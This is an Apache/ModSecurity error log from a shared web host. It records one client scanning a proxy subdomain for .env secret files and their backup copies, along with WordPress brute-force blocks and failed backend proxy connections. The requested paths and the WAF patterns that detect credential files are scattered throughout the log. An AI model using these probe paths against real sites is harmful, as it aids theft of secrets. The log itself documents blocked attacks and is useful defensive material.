[Tue May 26 15:40:16.907739 2026] [proxy_http:error] [pid 733610:tid 733825] [client 142.248.80.222:61346] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.908007 2026] [proxy:error] [pid 733610:tid 733850] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.908042 2026] [proxy_http:error] [pid 733610:tid 733850] [client 142.248.80.222:61356] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.908328 2026] [proxy:error] [pid 733610:tid 733825] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.908361 2026] [proxy_http:error] [pid 733610:tid 733825] [client 142.248.80.222:61346] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.908691 2026] [security2:error] [pid 733610:tid 733807] [client 142.248.80.222:61306] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/api/.env"] [unique_id "ahVxiMLL_4PasUNKBsfOZAAAAEM"]
[Tue May 26 15:40:16.908874 2026] [proxy:error] [pid 733610:tid 733741] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.908920 2026] [proxy_http:error] [pid 733610:tid 733741] [client 142.248.80.222:61326] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.909406 2026] [security2:error] [pid 733610:tid 733864] [client 142.248.80.222:61318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/backend/.env"] [unique_id "ahVxiMLL_4PasUNKBsfOZQAAAHw"]
[Tue May 26 15:40:16.909427 2026] [proxy:error] [pid 733610:tid 733813] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.909466 2026] [proxy_http:error] [pid 733610:tid 733813] [client 142.248.80.222:61336] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.909576 2026] [proxy:error] [pid 733610:tid 733741] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.909611 2026] [proxy_http:error] [pid 733610:tid 733741] [client 142.248.80.222:61326] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.909879 2026] [proxy:error] [pid 733610:tid 733852] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.909925 2026] [proxy_http:error] [pid 733610:tid 733852] [client 142.248.80.222:61348] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.910086 2026] [proxy:error] [pid 733610:tid 733813] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.910117 2026] [proxy_http:error] [pid 733610:tid 733813] [client 142.248.80.222:61336] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.910282 2026] [security2:error] [pid 733610:tid 733817] [client 142.248.80.222:61296] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/app/.env"] [unique_id "ahVxiMLL_4PasUNKBsfOZgAAAE0"]
[Tue May 26 15:40:16.910604 2026] [proxy:error] [pid 733610:tid 733852] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.910658 2026] [proxy_http:error] [pid 733610:tid 733852] [client 142.248.80.222:61348] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.911418 2026] [proxy:error] [pid 733610:tid 733818] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.911458 2026] [proxy_http:error] [pid 733610:tid 733818] [client 142.248.80.222:61290] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.911887 2026] [security2:error] [pid 733610:tid 733843] [client 142.248.80.222:61270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env"] [unique_id "ahVxiMLL_4PasUNKBsfOaQAAAGc"]
[Tue May 26 15:40:16.912148 2026] [proxy:error] [pid 733610:tid 733818] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.912182 2026] [proxy_http:error] [pid 733610:tid 733818] [client 142.248.80.222:61290] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.913863 2026] [proxy:error] [pid 733610:tid 733772] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.913900 2026] [proxy_http:error] [pid 733610:tid 733772] [client 142.248.80.222:61278] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:16.914460 2026] [proxy:error] [pid 733610:tid 733772] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:16.914489 2026] [proxy_http:error] [pid 733610:tid 733772] [client 142.248.80.222:61278] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:17.358779 2026] [security2:error] [pid 733610:tid 733773] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxicLL_4PasUNKBsfOdAAAACE"]
[Tue May 26 15:40:17.868705 2026] [security2:error] [pid 733610:tid 733760] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxicLL_4PasUNKBsfOiAAAABQ"], referer: https://bloggertarget.com/assets/manifest.json
[Tue May 26 15:40:18.043786 2026] [proxy:error] [pid 733610:tid 733794] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:18.043860 2026] [proxy_http:error] [pid 733610:tid 733794] [client 142.248.80.222:61270] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:18.044463 2026] [proxy:error] [pid 733610:tid 733794] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:18.044502 2026] [proxy_http:error] [pid 733610:tid 733794] [client 142.248.80.222:61270] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:18.152919 2026] [security2:error] [pid 733610:tid 733815] [client 103.153.130.62:57023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxisLL_4PasUNKBsfOmQAAAEs"]
[Tue May 26 15:40:18.153030 2026] [security2:error] [pid 733610:tid 733815] [client 103.153.130.62:57023] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxisLL_4PasUNKBsfOmQAAAEs"]
[Tue May 26 15:40:18.523797 2026] [security2:error] [pid 733610:tid 733744] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxisLL_4PasUNKBsfOlQAAAAQ"]
[Tue May 26 15:40:18.719719 2026] [security2:error] [pid 733610:tid 733859] [client 142.248.80.222:61306] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.copy"] [unique_id "ahVxisLL_4PasUNKBsfOqAAAAHc"]
[Tue May 26 15:40:18.724089 2026] [proxy:error] [pid 733610:tid 733754] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:18.724141 2026] [proxy_http:error] [pid 733610:tid 733754] [client 142.248.80.222:61318] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:18.724346 2026] [proxy:error] [pid 733610:tid 733797] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:18.724410 2026] [proxy_http:error] [pid 733610:tid 733797] [client 142.248.80.222:61296] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:18.724767 2026] [proxy:error] [pid 733610:tid 733754] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:18.724800 2026] [proxy_http:error] [pid 733610:tid 733754] [client 142.248.80.222:61318] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:18.725324 2026] [proxy:error] [pid 733610:tid 733797] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:18.725371 2026] [proxy_http:error] [pid 733610:tid 733797] [client 142.248.80.222:61296] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:18.865426 2026] [security2:error] [pid 733610:tid 733835] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxisLL_4PasUNKBsfOqwAAAF8"]
[Tue May 26 15:40:19.158952 2026] [security2:error] [pid 733610:tid 733659] [remote 103.11.102.106:53466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVxisLL_4PasUNKBsfOrwAACTA"]
[Tue May 26 15:40:19.438805 2026] [security2:error] [pid 733610:tid 733779] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxi8LL_4PasUNKBsfOswAAACc"], referer: https://bloggertarget.com/stats.json
[Tue May 26 15:40:19.809700 2026] [security2:error] [pid 733610:tid 733809] [client 142.248.80.222:61700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.copy"] [unique_id "ahVxi8LL_4PasUNKBsfOxQAAAEU"]
[Tue May 26 15:40:19.810939 2026] [security2:error] [pid 733610:tid 733740] [client 142.248.80.222:61692] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.swp"] [unique_id "ahVxi8LL_4PasUNKBsfOxgAAAAA"]
[Tue May 26 15:40:19.811220 2026] [security2:error] [pid 733610:tid 733742] [client 142.248.80.222:61698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.orig"] [unique_id "ahVxi8LL_4PasUNKBsfOxwAAAAI"]
[Tue May 26 15:40:19.812328 2026] [security2:error] [pid 733610:tid 733791] [client 142.248.80.222:61676] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env~"] [unique_id "ahVxi8LL_4PasUNKBsfOyQAAADM"]
[Tue May 26 15:40:19.812642 2026] [proxy:error] [pid 733610:tid 733748] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:19.812691 2026] [proxy_http:error] [pid 733610:tid 733748] [client 142.248.80.222:61662] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:19.813452 2026] [proxy:error] [pid 733610:tid 733748] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:19.813490 2026] [proxy_http:error] [pid 733610:tid 733748] [client 142.248.80.222:61662] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:19.813516 2026] [security2:error] [pid 733610:tid 733856] [client 142.248.80.222:61634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.old"] [unique_id "ahVxi8LL_4PasUNKBsfOywAAAHQ"]
[Tue May 26 15:40:19.813524 2026] [security2:error] [pid 733610:tid 733847] [client 142.248.80.222:61646] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.backup"] [unique_id "ahVxi8LL_4PasUNKBsfOygAAAGs"]
[Tue May 26 15:40:19.813831 2026] [security2:error] [pid 733610:tid 733787] [client 142.248.80.222:61624] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.bak"] [unique_id "ahVxi8LL_4PasUNKBsfOzAAAAC8"]
[Tue May 26 15:40:19.814789 2026] [proxy:error] [pid 733610:tid 733816] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:19.814863 2026] [proxy_http:error] [pid 733610:tid 733816] [client 142.248.80.222:61618] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:19.815448 2026] [proxy:error] [pid 733610:tid 733816] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:19.815499 2026] [proxy_http:error] [pid 733610:tid 733816] [client 142.248.80.222:61618] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:19.815731 2026] [proxy:error] [pid 733610:tid 733778] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:19.815805 2026] [proxy_http:error] [pid 733610:tid 733778] [client 142.248.80.222:61602] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:19.816063 2026] [proxy:error] [pid 733610:tid 733748] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:19.816112 2026] [proxy_http:error] [pid 733610:tid 733748] [client 142.248.80.222:61594] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:19.816696 2026] [security2:error] [pid 733610:tid 733763] [client 142.248.80.222:61306] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.backup"] [unique_id "ahVxi8LL_4PasUNKBsfO0QAAABc"]
[Tue May 26 15:40:19.816698 2026] [proxy:error] [pid 733610:tid 733829] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:19.816754 2026] [proxy_http:error] [pid 733610:tid 733829] [client 142.248.80.222:61584] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:19.816867 2026] [proxy:error] [pid 733610:tid 733778] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:19.816932 2026] [proxy_http:error] [pid 733610:tid 733778] [client 142.248.80.222:61602] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:19.817045 2026] [proxy:error] [pid 733610:tid 733748] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:19.817087 2026] [proxy_http:error] [pid 733610:tid 733748] [client 142.248.80.222:61594] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:19.817513 2026] [proxy:error] [pid 733610:tid 733829] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:19.817556 2026] [proxy_http:error] [pid 733610:tid 733829] [client 142.248.80.222:61584] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:19.900423 2026] [security2:error] [pid 733610:tid 733768] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxi8LL_4PasUNKBsfOwQAAABw"]
[Tue May 26 15:40:20.349767 2026] [security2:error] [pid 733610:tid 733841] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxjMLL_4PasUNKBsfO2wAAAGU"], referer: https://bloggertarget.com/webpack-stats.json
[Tue May 26 15:40:20.460659 2026] [security2:error] [pid 733610:tid 733832] [client 142.248.80.222:61782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.old"] [unique_id "ahVxjMLL_4PasUNKBsfO4wAAAFw"]
[Tue May 26 15:40:20.460659 2026] [security2:error] [pid 733610:tid 733834] [client 142.248.80.222:61836] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.orig"] [unique_id "ahVxjMLL_4PasUNKBsfO3wAAAF4"]
[Tue May 26 15:40:20.461030 2026] [proxy:error] [pid 733610:tid 733777] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:20.461084 2026] [proxy_http:error] [pid 733610:tid 733777] [client 142.248.80.222:61798] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:20.461664 2026] [proxy:error] [pid 733610:tid 733777] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:20.461694 2026] [proxy_http:error] [pid 733610:tid 733777] [client 142.248.80.222:61798] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:20.461853 2026] [security2:error] [pid 733610:tid 733788] [client 142.248.80.222:61814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production~"] [unique_id "ahVxjMLL_4PasUNKBsfO4QAAADA"]
[Tue May 26 15:40:20.461853 2026] [security2:error] [pid 733610:tid 733846] [client 142.248.80.222:61750] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.orig"] [unique_id "ahVxjMLL_4PasUNKBsfO5gAAAGo"]
[Tue May 26 15:40:20.461999 2026] [security2:error] [pid 733610:tid 733863] [client 142.248.80.222:61732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local~"] [unique_id "ahVxjMLL_4PasUNKBsfO6AAAAHs"]
[Tue May 26 15:40:20.462017 2026] [security2:error] [pid 733610:tid 733802] [client 142.248.80.222:61828] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.swp"] [unique_id "ahVxjMLL_4PasUNKBsfO4AAAAD4"]
[Tue May 26 15:40:20.462059 2026] [security2:error] [pid 733610:tid 733819] [client 142.248.80.222:61760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.copy"] [unique_id "ahVxjMLL_4PasUNKBsfO5QAAAE8"]
[Tue May 26 15:40:20.463108 2026] [proxy:error] [pid 733610:tid 733744] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:20.463170 2026] [proxy_http:error] [pid 733610:tid 733744] [client 142.248.80.222:61720] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:20.463198 2026] [security2:error] [pid 733610:tid 733782] [client 142.248.80.222:61710] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.aastha-enterprises.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.old"] [unique_id "ahVxjMLL_4PasUNKBsfO5AAAACo"]
[Tue May 26 15:40:20.463771 2026] [proxy:error] [pid 733610:tid 733744] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:20.463809 2026] [proxy_http:error] [pid 733610:tid 733744] [client 142.248.80.222:61720] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
